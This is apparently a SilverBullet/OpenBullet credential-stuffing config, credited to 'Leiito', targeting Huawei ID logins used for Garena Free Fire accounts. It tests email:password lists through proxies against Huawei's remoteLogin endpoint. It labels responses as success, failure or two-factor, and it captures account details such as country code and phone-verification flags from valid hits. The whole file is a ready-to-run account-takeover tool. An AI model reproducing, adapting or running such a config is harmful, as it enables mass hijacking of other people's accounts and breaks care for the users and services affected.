[SETTINGS]
{
  "Name": "FREE FIRE V2 -Leiito-",
  "SuggestedBots": 45,
  "MaxCPM": 0,
  "LastModified": "2022-01-15T14:51:00.7879163-08:00",
  "AdditionalInfo": "Leiito",
  "RequiredPlugins": [],
  "Author": "Leiito",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "FREE FIRE V2 -Leiito-",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION RandomString "?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h" -> VAR "ptk" 

FUNCTION RandomString "?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h" -> VAR "ptkk" 

REQUEST POST "https://id7.cloud.huawei.com/CAS/IDM_W/ajaxHandler/remoteLogin?reflushCode=0.9373766246178068" 
  CONTENT "pageToken=<ptk>&pageTokenKey=<ptkk>&loginUrl=https%3A%2F%2Fid7.cloud.huawei.com%3A443%2FCAS%2Fportal%2FloginAuth.html&service=https%3A%2F%2Foauth-login7.cloud.huawei.com%2Foauth2%2Fv2%2Flogin%3Fclient_id%3D100886055%26display%3Dpage%26flowID%3D1a87820c-7f65-4175-b728-71827da1cafd%26h%3D1617962729.5430%26lang%3Den-us%26redirect_uri%3Dhttps%253A%252F%252F100067.connect.garena.com%252Foauth%252Flogin%253Fresponse_type%253Dtoken%2526locale%253Dzh-TW%2526redirect_uri%253Dhttps%25253A%25252F%25252Freward.ff.garena.com%25252F%2526client_id%253D100067%2526all_platforms%253D1%2526platform%253D7%26response_type%3Dcode%26scope%3Dopenid%2Bhttps%253A%252F%252Fwww.huawei.com%252Fauth%252Faccount%252Fbase.profile%26v%3Da60d2237058821bae0939d3777d9de5f5552e2ad07d4fe0ee70babb3b3dd3644&loginChannel=90000300&reqClientType=90&lang=en-us&isThirdBind=0&hwmeta=&userAccount=<USER>&password=<PASS>&clientID=100886055&languageCode=en-us" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9,ar;q=0.8" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: 1063" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Cookie: JSESSIONID=4617BD52451B937CFE9D9D032623AA53240C1B88E5D67D87; VERSION_NO=UP_CAS_5.2.0.100; CAS_THEME_NAME=huawei" 
  HEADER "Host: id7.cloud.huawei.com" 
  HEADER "Origin: https://oauth-login.cloud.huawei.com" 
  HEADER "Referer: https://oauth-login.cloud.huawei.com/" 
  HEADER "sec-ch-ua: \"Google Chrome\";v=\"89\", \"Chromium\";v=\"89\", \";Not A Brand\";v=\"99\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "isSuccess\":0" 
  KEYCHAIN Success OR 
    KEY "isSuccess\":1" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "Current user need cross login" 

PARSE "<SOURCE>" LR "needVerifyOrChangePhone\":" ",\"" CreateEmpty=FALSE -> CAP "needVerifyOrChangePhone" 

PARSE "<SOURCE>" LR "needPopTrust\":" ",\"" CreateEmpty=FALSE -> CAP "needPopTrust" 

PARSE "<SOURCE>" LR "countryCode=" "\",\"" CreateEmpty=FALSE -> CAP "countryCode" 

PARSE "<SOURCE>" LR "qrCodeLoginSuccessFlag\":" "}" CreateEmpty=FALSE -> CAP "qrCodeLoginSuccessFlag" 

FUNCTION Constant "Author Leiito" -> CAP "Author Leiito" 

